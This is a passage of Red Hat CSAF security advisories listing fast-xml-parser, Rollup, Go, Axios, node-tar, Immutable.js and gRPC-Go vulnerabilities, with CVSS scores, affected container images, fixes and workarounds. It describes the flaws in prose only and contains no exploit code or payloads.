"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441501"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25896",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25896"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2"
}
],
"release_date": "2026-02-20T20:57:48.074000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling"
},
{
"cve": "CVE-2026-26278",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-02-19T21:03:33.363864+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441120"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted, small XML input. This input can force the XML parser to perform an unlimited amount of entity expansion, consuming excessive resources. This can lead to the application freezing for an extended period, resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26278"
},
{
"category": "external",
"summary": "RHBZ#2441120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26278",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26278"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26278"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj"
}
],
"release_date": "2026-02-19T19:40:55.842000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
},
{
"cve": "CVE-2026-27942",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-02-26T03:01:53.367202+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442938"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-xml-parser. A user can exploit this flaw by processing specially crafted XML data with the XML builder when the `preserveOrder` option is enabled. This can lead to a stack overflow, causing the application to crash and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The flaw affects the XML builder component of the fast-xml-parser library and is triggered only when the preserveOrder option is explicitly enabled. In Red Hat\u2013shipped configurations, this option is not enabled by default, and the vulnerable code path is therefore not exercised under typical deployments.\nThe underlying issue results in uncontrolled recursion leading to a stack overflow condition, which causes the application to terminate unexpectedly. While this can be triggered via crafted input, the impact is limited strictly to denial of service (DoS) and does not provide a mechanism for arbitrary code execution, privilege escalation, or data disclosure.\nFurthermore, exploitation requires that the affected application processes attacker-controlled XML input through the XML builder functionality with the specific vulnerable configuration enabled. This significantly reduces the attack surface and introduces environmental constraints not considered in the generalized NVD scoring.\n\nGiven the absence of confidentiality and integrity impact, the requirement for non-default configuration, and the limitation of the impact to process termination, Red Hat considers the practical risk to be lower than the NVD assessment. As such, this issue is classified as Moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27942"
},
{
"category": "external",
"summary": "RHBZ#2442938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442938"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27942",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27942"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3"
}
],
"release_date": "2026-02-26T01:22:11.383000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, configure applications using the `fast-xml-parser` XML builder to set the `preserveOrder` option to `false`. Alternatively, ensure that all XML input data is thoroughly validated before being passed to the builder to prevent the processing of malicious or malformed content.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service"
}
]
}
RHSA-2026:6428
Vulnerability from csaf_redhat - Published: 2026-04-02 07:50 - Updated: 2026-04-16 11:09A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found in node-tar. An attacker can craft a malicious archive that, when extracted with default options, creates a hardlink outside the intended extraction directory. This vulnerability allows the attacker to perform arbitrary file read and write operations as the user extracting the archive, bypassing existing path protections. This can lead to unauthorized access and modification of sensitive system files.
A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).
A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Network Observability 1.11 for Red Hat OpenShift.",
"title": "Topic"
},
{
"category": "general",
"text": "Network flows collector and monitoring solution.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6428",
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26960",
"url": "https://access.redhat.com/security/cve/CVE-2026-26960"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-29063",
"url": "https://access.redhat.com/security/cve/CVE-2026-29063"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33186",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.openshift.com/container-platform/latest/observability/network_observability/network-observability-operator-release-notes.html",
"url": "https://docs.openshift.com/container-platform/latest/observability/network_observability/network-observability-operator-release-notes.html"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6428.json"
}
],
"title": "Red Hat Security Advisory: Network Observability 1.11.1 for OpenShift",
"tracking": {
"current_release_date": "2026-04-16T11:09:12+00:00",
"generator": {
"date": "2026-04-16T11:09:12+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6428",
"initial_release_date": "2026-04-02T07:50:38+00:00",
"revision_history": [
{
"date": "2026-04-02T07:50:38+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-02T07:50:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:12+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Network Observability (NETOBSERV) 1.11.1",
"product": {
"name": "Network Observability (NETOBSERV) 1.11.1",
"product_id": "Network Observability (NETOBSERV) 1.11.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:network_observ_optr:1.11::el9"
}
}
}
],
"category": "product_family",
"name": "Network Observability (NETOBSERV)"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"product": {
"name": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"product_id": "registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"product_identification_helper": {
